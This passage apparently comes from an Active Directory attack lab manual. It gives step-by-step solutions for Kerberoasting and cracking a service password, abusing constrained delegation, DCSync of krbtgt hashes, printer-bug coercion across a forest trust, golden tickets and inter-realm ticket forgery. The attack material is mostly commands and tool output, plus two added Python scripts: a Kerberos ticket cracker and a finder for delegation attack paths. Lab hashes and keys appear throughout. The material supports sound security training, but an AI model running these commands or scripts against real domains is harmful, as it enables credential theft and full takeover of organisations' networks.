PS C:\AD\Tools> Get-ADTrust -Filter 'IntraForest -ne $true' | %{Get-ADUser -
Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName -
Server $_.Name}

[snip]

DistinguishedName : CN=storagesvc,CN=Users,DC=eu,DC=local
Enabled : True
GivenName : storage
Name : storagesvc
ObjectClass : user
ObjectGUID : 041fedb0-a442-4cdf-af34-6559480a2d74
SamAccountName : storagesvc
ServicePrincipalName : {MSSQLSvc/eu-file.eu.local}
SID : S-1-5-21-3657428294-2017276338-1274645009-1106
Surname : svc
UserPrincipalName : storagesvc

Once we have identified the target account, let's request a TGS:

C:\Users\studentuserx>C:\AD\Tools\Rubeus.exe kerberoast /user:storagesvc /simple /domain:eu.local /outfile:C:\AD\Tools\euhashes.txt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User : storagesvc
[*] Target Domain : eu.local
[*] Searching path 'LDAP://eu.local/DC=eu,DC=local' for Kerberoastable users

[*] Total kerberoastable users : 1

[*] Hash written to C:\AD\Tools\euhashes.txt

[*] Roasted hashes written to : C:\AD\Tools\euhashes.txt

Run klist to check if the ticket is present:

C:\AD\Tools>klist
#3> Client: studentuserx @ US.TECHCORP.LOCAL
Server: MSSQLSvc/eu-file.eu.local @ EU.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40210000 -> forwardable pre_authent name_canonicalize
Start Time: 1/15/2021 4:32:32 (local)
End Time: 1/15/2021 14:29:35 (local)
Renew Time: 0
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x200 -> DISABLE-TGT-DELEGATION
Kdc Called: EU-DC.eu.local

Now, we can crack the hash offline with John the Ripper. The ticket was issued with etype 23 (RC4-HMAC, see the klist output above), so each guess costs one MD4 and a handful of MD5-based operations, which is why RC4 service tickets crack so quickly:

C:\Users\studentuser23>C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\euhashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Qwerty@123 (?)
1g 0:00:00:00 DONE (2021-01-15 04:52) 83.33g/s 64000p/s 64000c/s 64000C/s password..9999
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Hands-On 23:
Task
• Enumerate users in the eu.local domain for whom Constrained Delegation is enabled.
• Abuse the Delegation to execute DCSync attack against eu.local.

Solution
To enumerate users with constrained delegation we can use the ActiveDirectory module:

C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-
master\Microsoft.ActiveDirectory.Management.dll
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-
master\ActiveDirectory\ActiveDirectory.psd1
PS C:\AD\Tools> Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -
Properties msDS-AllowedToDelegateTo -Server eu.local

DistinguishedName : CN=storagesvc,CN=Users,DC=eu,DC=local
msDS-AllowedToDelegateTo : {time/EU-DC.eu.local/eu.local, time/EU-
DC.eu.local, time/EU-DC, time/EU-DC.eu.local/EU...}
Name : storagesvc
ObjectClass : user
ObjectGUID : 041fedb0-a442-4cdf-af34-6559480a2d74
[snip]

Now, to abuse the Constrained Delegation that storagesvc has to eu-dc we need either its password or its Kerberos keys. We already have storagesvc's cleartext password from the Kerberoast in the previous Hands-On, so derive the keys with Rubeus on the student VM:

C:\Users\studentuserx>C:\AD\Tools\Rubeus.exe hash /password:Qwerty@123 /user:storagesvc /domain:eu.local

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Calculate Password Hash(es)

[*] Input password : Qwerty@123
[*] Input username : storagesvc
[*] Input domain : eu.local
[*] Salt : EU.LOCALstoragesvc
[*] rc4_hmac : 5C76877A9C454CDED58807C20C20AEAC
[*] aes128_cts_hmac_sha1 : 4A5DDDB19CD631AEE9971FB40A8195B8
[*] aes256_cts_hmac_sha1 : 4A0D89D845868AE3DCAB270FE23BEDD442A62C4CAD7034E4C60BEDA3C0F65E04
[*] des_cbc_md5 : 7F7C6ED00258DC57
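
Both the John run in Hands-On 22 and the rc4_hmac value Rubeus just printed rest on the same arithmetic: the RC4-HMAC Kerberos key is the NT hash, MD4 over the UTF-16LE password, and a service ticket sealed with it can be checked against a guess with three HMAC-MD5 operations and one RC4 pass. The following Python is an added example for this manual rather than lab tooling. It implements exactly that and runs a dictionary attack over a $krb5tgs$23$ line it constructs itself; the service password, SPN and realm in the sample are made up and no ticket from eu.local is embedded. The same nt_hash function reproduces the rc4_hmac line above from Qwerty@123.

```python
"""Kerberoast check for RC4-HMAC (etype 23) service tickets, from first principles.

Added example for Hands-On 22 and 23, not lab tooling. Standard library only: MD4 is
implemented inline because hashlib may lack it on OpenSSL 3 builds. The sample ticket
is constructed with a made-up password; no eu.local material is embedded.
"""
import hashlib
import hmac
import os
import struct

MASK32 = 0xFFFFFFFF
KEY_USAGE_TICKET = 2  # RFC 4120 key usage for a service ticket's enc-part (what John uses)


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 over the UTF-16LE password."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK32

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (mixing function, additive constant, message word order, shifts)
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rotl((a + func(b, c, d) + x[k] + const) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next step updates what was d
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """The rc4_hmac line 'Rubeus.exe hash' prints above: MD4(UTF-16LE(password))."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key, plaintext, usage=KEY_USAGE_TICKET):
    """RFC 4757 seal: checksum || RC4(K3, confounder || plaintext). Used only to build the sample."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    body = os.urandom(8) + plaintext
    checksum = _hmac_md5(k1, body)
    return checksum + rc4(_hmac_md5(k1, checksum), body)


def rc4_hmac_key_matches(key, edata, usage=KEY_USAGE_TICKET):
    """The per-guess test a cracker runs: derive K3 from the guessed key, decrypt,
    and see whether the 16-byte checksum at the front verifies."""
    checksum, ciphertext = edata[:16], edata[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    body = rc4(_hmac_md5(k1, checksum), ciphertext)
    return hmac.compare_digest(_hmac_md5(k1, body), checksum)


def format_krb5tgs(user, realm, spn, edata):
    """Line layout Rubeus writes with /outfile for etype 23 (what John loaded above)."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"


def parse_krb5tgs(line):
    head, checksum_hex, cipher_hex = line.strip().rsplit("$", 2)
    if not head.startswith("$krb5tgs$23$*"):
        raise ValueError("not an etype-23 krb5tgs line")
    return bytes.fromhex(checksum_hex) + bytes.fromhex(cipher_hex)


def crack(line, wordlist):
    """Dictionary attack: first candidate whose NT hash verifies the ticket, else None."""
    edata = parse_krb5tgs(line)
    return next((w for w in wordlist if rc4_hmac_key_matches(nt_hash(w), edata)), None)


def make_sample_hash(service_password):
    """Constructed ticket: a stand-in enc-part sealed under the service account's NT hash."""
    enc_part = b"EncTicketPart placeholder: flags, session key, PAC ..."
    edata = rc4_hmac_encrypt(nt_hash(service_password), enc_part)
    return format_krb5tgs("svc_sample", "EXAMPLE.LOCAL", "MSSQLSvc/db.example.local", edata)


if __name__ == "__main__":
    sample = make_sample_hash("Autumn2021!")  # constructed service password
    print(nt_hash("Qwerty@123").hex())        # matches the rc4_hmac line above
    print("cracked:", crack(sample, ["password", "Qwerty@123", "Autumn2021!"]))
```

Paste a real line from euhashes.txt into crack() and it behaves like John with a wordlist, only far slower. The point is that nothing in an etype-23 ticket slows a guess down, which is why AES-only service accounts and long service passwords are the fix. Note that the key usage number (2) feeds the key derivation: a guess checked with any other usage fails even when the password is right.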

C:\Users\studentuserx>C:\AD\Tools\Rubeus.exe s4u /user:storagesvc /rc4:5C76877A9C454CDED58807C20C20AEAC /impersonateuser:Administrator /domain:eu.local /msdsspn:nmagent/eu-dc.eu.local /altservice:ldap /dc:eu-dc.eu.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[snip]

[+] Ticket successfully imported!

Check the ticket:

C:\Users\studentuserx>klist

Current LogonId is 0:0x531af0e

Cached Tickets: (1)

#0> Client: Administrator @ EU.LOCAL
Server: ldap/eu-dc.eu.local @ EU.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40250000 -> forwardable pre_authent ok_as_delegate
name_canonicalize
Start Time: 1/15/2021 5:02:14 (local)
End Time: 1/15/2021 15:02:14 (local)
Renew Time: 0
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

Note that we requested an alternate ticket for the LDAP service: storagesvc is only allowed to delegate to nmagent on eu-dc, but the service name in a service ticket is not protected by the KDC (only the host account's key is), so /altservice swaps nmagent for ldap and the ticket is accepted. Since we are impersonating the domain administrator of eu.local, we should now be able to run the DCSync attack against eu.local:

C:\Users\studentuserx>C:\AD\Tools\SharpKatz.exe --Command dcsync --User eu\krbtgt --Domain eu.local --DomainController eu-dc.eu.local
[*]
[*] System Information
[*] ----------------------------------------------------------------------
[*] | Platform: Win32NT |
[*] ----------------------------------------------------------------------
[*] | Major: 10 | Minor: 0 | Build: 17763 |
[*] ----------------------------------------------------------------------
[*] | Version: Microsoft Windows NT 6.2.9200.0 |
[*] ----------------------------------------------------------------------
[*]
[!] eu.local will be the domain
[!] eu-dc.eu.local will be the DC server
[!] eu\krbtgt will be the user account
[*]
[*] Object RDN : krbtgt
[*]
[*] ** SAM ACCOUNT **
[*]
[*] SAM Username : krbtgt
[*] User Principal Name :
[*] Account Type : USER_OBJECT
[*] User Account Control : ACCOUNTDISABLE, NORMAL_ACCOUNT
[*] Account expiration : 12/31/9999 11:59:59 PM
[*] Password last change : 7/12/2019 11:00:04 PM
[*] Object Security ID : S-1-5-21-3657428294-2017276338-1274645009-502
[*] Object Relative ID : 502
[*]
[*] Credents:
[*] Hash NTLM : 83ac1bab3e98ce6ed70c9d5841341538
[*] ntlm- 0 : 83ac1bab3e98ce6ed70c9d5841341538
[*] lm - 0 : bcb73c3d2b4005e405ff7399f3ca2bf0
[*]
[*] Supplemental Credents:
[*]
[*] * Primary:NTLM-Strong-NTOWF
[*] Random Value : a0c1c86edafc0218a106426f2309bafd
[*]
[*] * Primary:Kerberos-Newer-Keys
[*] Default Salt :EU.LOCALkrbtgt
[*] Credents
[*] aes256_hmac 4096:
b3b88f9288b08707eab6d561fefe286c178359bda4d9ed9ea5cb2bd28540075d
[*] aes128_hmac 4096: e2ef89cdbd94d396f63c9aa5b66e16c7
[snip]

C:\Users\studentuserx>C:\AD\Tools\SharpKatz.exe --Command dcsync --User eu\administrator --Domain eu.local --DomainController eu-dc.eu.local

Hands-On 24:
Task
• Abuse the Unconstrained Delegation on us-web to get Enterprise Admin privileges on
usvendor.local.

Solution
If TGT delegation is enabled across a forest trust (it is off by default on patched DCs and has to be switched on per trust with netdom /EnableTGTDelegation), the printer bug can be abused across a two-way forest trust exactly as within the forest. This hands-on is kept separate from the previous ones because the impact is very high: one trust setting hands over the other forest. The commands are the same as in Hands-On 18.
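
A practitioner wants to verify the preconditions before firing MS-RPRN: a non-DC host trusted for unconstrained delegation, a trust across which TGTs are still forwarded, and, for the constrained delegation path of Hands-On 23, which hosts a delegating account can reach. The following Python is an added example, not lab code. It evaluates those conditions over constructed records shaped like the AD module's output (the userAccountControl and trustAttributes bit values are the documented ones; the sample objects are made up to mirror the lab) and covers Hands-On 18, 23 and this one.

```python
"""Delegation and trust triage for the printer-bug and S4U paths in Hands-On 18, 23 and 24.

Added example, not lab tooling. Works on constructed dicts shaped like the AD
module's output, so no directory is touched; bit values are the documented
userAccountControl and trustAttributes flags.
"""

# userAccountControl bits
UF_SERVER_TRUST_ACCOUNT = 0x2000               # domain controller account
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition: S4U2Self for any user

# trustAttributes bits
TA_FOREST_TRANSITIVE = 0x8
TA_WITHIN_FOREST = 0x20
TA_NO_TGT_DELEGATION = 0x200       # CROSS_ORGANIZATION_NO_TGT_DELEGATION
TA_ENABLE_TGT_DELEGATION = 0x800   # CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION

# Services worth substituting via Rubeus /altservice once any ticket for a host exists.
HIGH_VALUE_SERVICES = ("ldap", "cifs", "host", "http", "wsman")


def tgt_delegation_allowed(trust_attributes: int) -> bool:
    """Will a TGT be forwarded (unconstrained delegation) to a host on the other side?

    Always inside a forest. Across a forest trust this assumes DCs with the 2019
    hardening: off unless ENABLE_TGT_DELEGATION was set (netdom /EnableTGTDelegation:Yes),
    and NO_TGT_DELEGATION wins if both bits are present.
    """
    if trust_attributes & TA_WITHIN_FOREST:
        return True
    if trust_attributes & TA_NO_TGT_DELEGATION:
        return False
    return bool(trust_attributes & TA_ENABLE_TGT_DELEGATION)


def unconstrained_hosts(computers):
    """Non-DC computers trusted for unconstrained delegation (DCs carry the bit by design)."""
    return [c["name"] for c in computers
            if c["userAccountControl"] & UF_TRUSTED_FOR_DELEGATION
            and not c["userAccountControl"] & UF_SERVER_TRUST_ACCOUNT]


def printer_bug_paths(computers, trusts):
    """(host, domain) pairs where coercing that domain's DC with MS-RPRN would hand
    the host a forwarded TGT of the DC's machine account, as in Hands-On 18 and 24."""
    return [(host, t["name"]) for host in unconstrained_hosts(computers)
            for t in trusts if tgt_delegation_allowed(t["trustAttributes"])]


def s4u_targets(users):
    """Hosts reachable via constrained delegation, per Hands-On 23.

    Only the host part of each msDS-AllowedToDelegateTo entry matters: the service
    name in the resulting ticket is not protected, so any service on that host can
    be requested with /altservice. protocol_transition records whether S4U2Self can
    mint tickets for arbitrary users, which the usual s4u chain needs.
    """
    targets = {}
    for user in users:
        can_transition = bool(user["userAccountControl"] & UF_TRUSTED_TO_AUTH_FOR_DELEGATION)
        for spn in user.get("msDS-AllowedToDelegateTo") or []:
            service, _, rest = spn.partition("/")
            host = rest.split("/")[0].split(":")[0].lower()  # drop instance name and port
            entry = targets.setdefault(host, {"accounts": set(), "spns": set(), "protocol_transition": False})
            entry["accounts"].add(user["samAccountName"])
            entry["spns"].add(service.lower())
            entry["protocol_transition"] |= can_transition
    return targets


# Constructed sample modelled on the lab, not a real export.
SAMPLE_COMPUTERS = [
    {"name": "us-web", "userAccountControl": 0x1000 | UF_TRUSTED_FOR_DELEGATION},
    {"name": "us-dc", "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION},
    {"name": "us-mgmt", "userAccountControl": 0x1000},
]
SAMPLE_TRUSTS = [
    {"name": "techcorp.local", "trustAttributes": TA_WITHIN_FOREST},                       # parent domain
    {"name": "usvendor.local", "trustAttributes": TA_FOREST_TRANSITIVE | TA_ENABLE_TGT_DELEGATION},
    {"name": "eu.local", "trustAttributes": TA_FOREST_TRANSITIVE},                         # hardened default
]
SAMPLE_USERS = [
    {"samAccountName": "storagesvc",
     "userAccountControl": 0x200 | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["time/EU-DC.eu.local/eu.local", "time/EU-DC.eu.local",
                                  "time/EU-DC", "nmagent/EU-DC.eu.local"]},
]

if __name__ == "__main__":
    for host, domain in printer_bug_paths(SAMPLE_COMPUTERS, SAMPLE_TRUSTS):
        print(f"printer bug: coerce the DC of {domain} -> its TGT lands on {host}")
    for host, info in s4u_targets(SAMPLE_USERS).items():
        extra = sorted(set(HIGH_VALUE_SERVICES) - info["spns"])
        print(f"S4U via {', '.join(sorted(info['accounts']))} to {host}: allowed {sorted(info['spns'])}, "
              f"altservice candidates {extra}, protocol transition {info['protocol_transition']}")
```

With real data the computer records come from Get-ADComputer (userAccountControl), the trust records from Get-ADTrust (TrustAttributes) and the user records from the Get-ADObject query in Hands-On 23. The eu.local entry in the sample shows the hardened default: a forest trust without the ENABLE bit yields no printer-bug path, which is why that forest was attacked through Kerberoast and constrained delegation instead.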

Start a new process as webmaster, who has admin privileges on us-web:

C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgt /domain:us.techcorp.local /user:webmaster /aes256:2a653f166761226eb2e939218f5a34d3d2af005a91f160540da6e4a5e29de8a0 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
[snip]

Copy Rubeus.exe to us-web and start monitoring for any TGT arriving from usvendor-dc. Run the below commands in the process running as webmaster:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Rubeus.exe \\us-web\C$\Users\Public\Rubeus.exe /Y
[snip]

C:\Windows\system32>winrs -r:us-web cmd.exe
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\webmaster>C:\Users\Public\Rubeus.exe monitor /targetuser:usvendor-dc$ /interval:5 /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: TGT Monitoring
[*] Target user : usvendor-dc$
[*] Monitoring every 5 seconds for new TGTs

Next, run MS-RPRN.exe on the student VM to abuse the printer bug. Note that this time we target usvendor-dc. The tool's message differs from the previous Hands-On (access denied rather than an invalid handle), but in both cases the spooler on the target DC has already authenticated to us-web, which is all we need:

C:\AD\Tools>C:\AD\Tools\MS-RPRN.exe \\usvendor-dc.usvendor.local \\us-web.us.techcorp.local
Target server attempted authentication and got an access denied. If coercing authentication to an NTLM challenge-response capture tool(e.g. responder/inveigh/MSF SMB capture), this is expected and indicates the coerced authentication worked.

On the session where Rubeus is running, we can see:

[snip]
[*] 1/15/2021 2:09:34 PM UTC - Found new TGT:

User : USVENDOR-DC$@USVENDOR.LOCAL
StartTime : 1/15/2021 6:08:09 AM
EndTime : 1/15/2021 4:08:07 PM
RenewTill : 12/31/1969 4:00:00 PM
Flags : name_canonicalize, pre_authent, forwarded, forwardable
Base64EncodedTicket : [snip]

[*] Ticket cache size: 1

^C

We can copy Base64EncodedTicket, remove unnecessary spaces and newlines (if any) and use the ticket with Rubeus on the student VM:

C:\AD\Tools>C:\AD\Tools\Rubeus.exe ptt /ticket:TGTofUSVendor-DC$

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Import Ticket


[+] Ticket successfully imported!

We can now run a DCSync attack against usvendor-dc using the injected ticket (the usvendor-dc$ machine account has replication rights in its own domain):

C:\AD\Tools>C:\AD\Tools\SharpKatz.exe --Command dcsync --User usvendor\krbtgt --Domain usvendor.local --DomainController usvendor-dc.usvendor.local
[*]
[*] System Information
[*] ----------------------------------------------------------------------
[*] | Platform: Win32NT |
[*] ----------------------------------------------------------------------
[*] | Major: 10 | Minor: 0 | Build: 17763 |
[*] ----------------------------------------------------------------------
[*] | Version: Microsoft Windows NT 6.2.9200.0 |
[*] ----------------------------------------------------------------------
[*]
[!] usvendor.local will be the domain
[!] usvendor-dc.usvendor.local will be the DC server
[!] usvendor\krbtgt will be the user account
[*]
[*] Object RDN : krbtgt
[*]
[*] ** SAM ACCOUNT **
[*]
[*] SAM Username : krbtgt
[*] User Principal Name :
[*] Account Type : USER_OBJECT
[*] User Account Control : ACCOUNTDISABLE, NORMAL_ACCOUNT
[*] Account expiration : 12/31/9999 11:59:59 PM
[*] Password last change : 7/12/2019 10:09:18 PM
[*] Object Security ID : S-1-5-21-2028025102-2511683425-2951839092-502
[*] Object Relative ID : 502
[*]
[*] Credents:
[*] Hash NTLM : 335caf1a29240a5dd318f79b6deaf03f
[snip]

Hands-On 25:
Task
• Using the DA access to eu.local:
− Access eushare on euvendor-dc.
− Access euvendor-net using PowerShell Remoting.

Solution
We have DA access on the eu.local forest that has a trust relationship with euvendor.local. Let's use the
trust key between eu.local and euvendor.local. We can extract the trust key using a Golden ticket (or
Administrator keys) for eu.local.

Access eushare on euvendor-dc


Run the below command from an elevated shell on the student VM to get a command prompt with the
privileges of domain administrator on eu.local and use DCSync to get the trust keys:

C:\Windows\system32>C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/user:Administrator /domain:eu.local /sid:S-1-5-21-3657428294-2017276338-
1274645009
/aes256:b3b88f9288b08707eab6d561fefe286c178359bda4d9ed9ea5cb2bd28540075d
/ptt"
[snip]
Golden ticket for 'Administrator @ eu.local' successfully submitted for
current session
[snip]

mimikatz# lsadump::dcsync /user:eu\euvendor$ /domain:eu.local


[DC] 'eu.local' will be the domain
[DC] 'EU-DC.eu.local' will be the DC server
[DC] 'eu\euvendor$' will be the user account

Object RDN : EUVENDOR$

** SAM ACCOUNT **

SAM Username : EUVENDOR$
Account Type : 30000002 ( TRUST_ACCOUNT )
User Account Control : 00000820 ( PASSWD_NOTREQD INTERDOMAIN_TRUST_ACCOUNT )
Account expiration :
Password last change : 1/7/2021 6:04:14 AM
Object Security ID : S-1-5-21-3657428294-2017276338-1274645009-1107
Object Relative ID : 1107

Credentials:
Hash NTLM: bd5aba58c5876f08eb56fff91fa61c5d
[snip]
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *

Default Salt : EU.LOCALkrbtgtEUVENDOR
Default Iterations : 4096
Credentials
aes256_hmac (4096) :
50a86b4c31c43245c61dcda8ec2d678c97a14a942f223ec1f8c447106e2e78d9
aes128_hmac (4096) : b5cf74c22109c8b3b9994e727457c345
des_cbc_md5 (4096) : 611a407631683b51
[snip]
mimikatz # exit
Bye!

Copy BetterSafetyKatz and Rubeus to eu-dc. Run the below commands in the above process where we
injected the Golden ticket for eu.local:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\BetterSafetyKatz.exe \\eu-dc.eu.local\C$\Users\Public\BetterSafetyKatz.exe /Y
[snip]
C:\Windows\system32>echo F | xcopy C:\AD\Tools\Rubeus.exe \\eu-
dc.eu.local\C$\Users\Public\Rubeus.exe /Y
[snip]

Now, forge an inter-realm TGT between eu.local and euvendor.local. We need to run the following
commands from eu-dc:

C:\Windows\system32>winrs -r:eu-dc.eu.local cmd


Microsoft Windows [Version 10.0.17763.1613]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Administrator>C:\Users\Public\BetterSafetyKatz.exe "kerberos::golden
/user:Administrator /domain:eu.local /sid:S-1-5-21-3657428294-2017276338-
1274645009 /rc4:629b1eaa7ec6cfe2f4943a853ad6b36b /service:krbtgt
/target:euvendor.local /sids:S-1-5-21-4066061358-3942393892-617142613-519
/ticket:C:\Users\Public\sharedwitheu.kirbi" "exit"
[snip]
User : Administrator
Domain : eu.local (EU)
SID : S-1-5-21-3657428294-2017276338-1274645009
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4066061358-3942393892-617142613-519 ;
XU2M3OZKey: 629b1eaa7ec6cfe2f4943a853ad6b36b - rc4_hmac_nt
XU2M3OZ : krbtgt
Target : euvendor.local
Lifetime : 1/15/2021 7:14:33 AM ; 1/13/2031 7:14:33 AM ; 1/13/2031 7:14:33
AM
-> Ticket : C:\Users\Public\sharedwitheu.kirbi

* PAC generated
* PAC signed

* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

3XWS2ZJ9(commandline) # exit
Bye!
[snip]

So, we have forged an inter-realm TGT. Let's use it to request a service ticket for CIFS on euvendor-dc and inject that ticket in our winrs session:

C:\Users\Administrator>C:\Users\Public\Rubeus.exe asktgs
/ticket:C:\Users\Public\sharedwitheu.kirbi /service:CIFS/euvendor-
dc.euvendor.local /dc:euvendor-dc.euvendor.local /ptt
C:\Users\Public\Rubeus.exe asktgs /ticket:C:\Users\Public\sharedwitheu.kirbi
/service:CIFS/euvendor-dc.euvendor.local /dc:euvendor-dc.euvendor.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Ask TGS

[*] Using domain controller: euvendor-dc.euvendor.local (192.168.12.212)


[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the
service ticket
[*] Building TGS-REQ request for: 'CIFS/euvendor-dc.euvendor.local'
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
[snip]
ServiceName : CIFS/euvendor-dc.euvendor.local
ServiceRealm : EUVENDOR.LOCAL
UserName : Administrator
UserRealm : eu.local
StartTime : 1/15/2021 7:14:42 AM
EndTime : 1/15/2021 5:14:42 PM
RenewTill : 1/1/0001 12:00:00 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent,
forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 4SrQNQ7dBya+YjlO7iT851dZAGXSRZB7h1kKldDS9tg=

Check for the ticket:

C:\Users\Administrator>klist
klist

[snip]
#2> Client: Administrator @ eu.local
Server: CIFS/euvendor-dc.euvendor.local @ EUVENDOR.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40250000 -> forwardable pre_authent ok_as_delegate
name_canonicalize
Start Time: 1/15/2021 7:14:42 (local)
End Time: 1/15/2021 17:14:42 (local)
Renew Time: 0
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

So, we have the TGS for CIFS on euvendor-dc. Since we reach euvendor-dc only as a Domain Admin of eu.local, we can
access only the resources that are explicitly shared with Domain Admins of eu.local:

C:\Users\Administrator>dir \\euvendor-dc.euvendor.local\eushare
dir \\euvendor-dc.euvendor.local\eushare
Volume in drive \\euvendor-dc.euvendor.local\eushare has no label.
Volume Serial Number is 88AD-6C8B

Directory of \\euvendor-dc.euvendor.local\eushare

07/14/2019 05:12 AM <DIR> .
07/14/2019 05:12 AM <DIR> ..
07/14/2019 05:13 AM 37 shared.txt
1 File(s) 37 bytes
2 Dir(s) 15,983,722,496 bytes free

C:\Users\Administrator>type \\euvendor-dc.euvendor.local\eushare\shared.txt
type \\euvendor-dc.euvendor.local\eushare\shared.txt
Shared with Domain Admins of eu.local
C:\Users\Administrator>exit
exit

C:\Windows\system32>

Note that we could use PowerShell Remoting too in place of winrs in the above steps.

Access euvendor-net using PowerShell Remoting
Let's check if SIDHistory is enabled for the trust between eu.local and euvendor.local using the Active
Directory module.

Run the below commands on the command prompt where we injected the Golden ticket for
administrator of eu.local to copy and run InvisiShell:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\InviShell\InShellProf.dll \\eu-dc.eu.local\C$\Users\Public\InShellProf.dll /Y
[snip]

C:\Windows\system32>echo F | xcopy
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat \\eu-
dc.eu.local\C$\Users\Public\RunWithRegistryNonAdmin.bat /Y
[snip]
C:\Windows\system32>winrs -r:eu-dc.eu.local cmd
Microsoft Windows [Version 10.0.17763.1613]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Administrator>C:\Users\Public\RunWithRegistryNonAdmin.bat
[snip]

